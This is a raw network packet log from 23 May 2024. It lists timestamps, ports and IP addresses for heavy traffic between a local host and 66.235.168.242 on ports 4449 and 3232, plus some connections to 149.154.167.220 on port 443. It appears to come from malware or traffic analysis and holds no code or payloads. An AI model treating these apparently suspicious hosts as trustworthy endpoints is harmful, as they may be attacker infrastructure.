May 23, 2024 15:34:11.376035929 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.376121044 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.376693964 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.376739979 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.377397060 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.377408981 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.377459049 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.377528906 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.378084898 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.378128052 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.378223896 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.378570080 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.378614902 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.378755093 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.379460096 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.379509926 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.379605055 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.380161047 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.380204916 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.380283117 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.380868912 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.380914927 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.381016016 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.381589890 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.381642103 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.382246017 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.382256985 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.382297039 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.382431984 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.382944107 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.382987022 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.383095980 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.383372068 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.383411884 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.383636951 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.384327888 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.384373903 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.384475946 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.385061026 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.385104895 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.385180950 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.385732889 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.385780096 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.386065960 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.386432886 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.386471987 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.387132883 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.387144089 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.387188911 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.387275934 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.387799025 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.387834072 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.387929916 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.388211966 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.388252974 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.388499975 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.389194012 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.389234066 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.389308929 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.389899015 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.389936924 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.390052080 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.390594959 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.390633106 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.390710115 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.391263962 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.391298056 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.392002106 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.392013073 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.392050028 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.392167091 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.392674923 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.392709970 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.392823935 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.393105030 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.393135071 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.393369913 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.394108057 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.394141912 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.394440889 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.394808054 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.394844055 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.394985914 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.395481110 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.395514011 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.395596981 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.396166086 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.396202087 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.396847010 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.396857977 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.396893024 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.397005081 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.397526979 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.397562027 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.397680998 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.398000956 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.398039103 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.398277044 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.398921013 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.398993969 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.399127007 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.399607897 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.399643898 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.399763107 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.400306940 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.400340080 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.400469065 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.401015043 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.401048899 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.401150942 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.401684999 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.401726007 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.402862072 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.402873039 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.402914047 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.438132048 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.438190937 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.458198071 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.462985039 CEST	443	61020	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.463165998 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.505199909 CEST	61020	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.506371975 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.512078047 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.527256966 CEST	61021	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.527337074 CEST	443	61021	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.527426958 CEST	61021	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.527674913 CEST	61021	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.527713060 CEST	443	61021	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.546123981 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.546188116 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.584404945 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.609311104 CEST	61022	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.612885952 CEST	61023	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.614466906 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.616019011 CEST	61024	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.618877888 CEST	61025	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.619890928 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.619960070 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.620069027 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.620080948 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.620100975 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.620136023 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.620948076 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.620959044 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.620980978 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.621001959 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.621812105 CEST	61026	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.623764992 CEST	61027	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.625869036 CEST	61028	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.626625061 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.629008055 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.629076958 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.640502930 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.640557051 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.640629053 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.640640020 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.640657902 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.640681028 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.645113945 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.645124912 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.645133972 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.645158052 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.645180941 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.650115013 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.650134087 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.650176048 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.650198936 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.660271883 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.660284042 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.660291910 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.660301924 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.660340071 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.660382986 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.661447048 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.661458015 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.661465883 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.661485910 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.661510944 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.669029951 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.669090033 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.671983004 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.672065973 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.676517010 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.676527023 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.676565886 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.681055069 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.681066990 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.681122065 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.685599089 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.685610056 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.685647964 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.690166950 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.690177917 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.690186024 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.690211058 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.690241098 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.694691896 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.694703102 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.694753885 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.699244022 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.699255943 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.699296951 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.708357096 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.708425045 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.712928057 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.712939024 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.712986946 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.716546059 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.716557026 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.716566086 CEST	3232	61022	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.716574907 CEST	4449	61023	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.716579914 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.716583967 CEST	4449	61024	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.716593027 CEST	4449	61025	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.716602087 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.716614962 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.716677904 CEST	61022	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.716696024 CEST	61024	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.716696024 CEST	61025	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.716710091 CEST	61023	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.716948986 CEST	61022	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.717132092 CEST	61023	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.717232943 CEST	61024	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.717232943 CEST	61025	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.720660925 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.720670938 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.720679045 CEST	4449	61026	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.720686913 CEST	4449	61027	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.720694065 CEST	4449	61028	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.720702887 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.720716000 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.720741034 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.720779896 CEST	61026	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.720779896 CEST	61027	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.720808983 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.720920086 CEST	61028	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.720963955 CEST	61027	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.721044064 CEST	61028	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.721095085 CEST	61026	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.727410078 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.727420092 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.727475882 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.727552891 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.727562904 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.727571011 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.727591038 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.727636099 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.735969067 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.735980034 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.736027002 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.739214897 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.739224911 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.739233971 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.739259958 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.741709948 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.741719961 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.741760969 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.746536016 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.746551991 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.746578932 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.749706984 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.749717951 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.749738932 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.752897024 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.752907038 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.752938032 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.755964994 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.755980015 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.755996943 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.758891106 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.758900881 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.758932114 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.759589911 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.759601116 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.759609938 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.759625912 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.759661913 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.763983011 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.763993025 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.764035940 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.765017033 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.765027046 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.765036106 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.765079021 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.767657042 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.767668962 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.767703056 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.770272970 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.770282984 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.770309925 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.772733927 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.772744894 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.772767067 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.775188923 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.775199890 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.775212049 CEST	3232	61022	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.775243044 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.777589083 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.777599096 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.777606010 CEST	4449	61023	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.777614117 CEST	4449	61024	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.777621031 CEST	4449	61025	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.777666092 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.779818058 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.779829025 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.779835939 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.779843092 CEST	4449	61027	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.779850960 CEST	4449	61028	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.779858112 CEST	4449	61026	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.779875994 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.785958052 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.785969019 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.785978079 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.786017895 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.786051035 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.786137104 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.786150932 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.786159039 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.786190987 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.787966013 CEST	61029	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.788038015 CEST	443	61029	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.788116932 CEST	61029	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.788367987 CEST	61029	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:11.788392067 CEST	443	61029	149.154.167.220	192.168.2.5
May 23, 2024 15:34:11.788467884 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.788480997 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.788510084 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.790594101 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.790604115 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.790662050 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.792685986 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.792695999 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.792747974 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.794668913 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.794678926 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.794687033 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.794722080 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.794753075 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.796602964 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.796612978 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.796658993 CEST	61010	4449	192.168.2.5	66.235.168.242
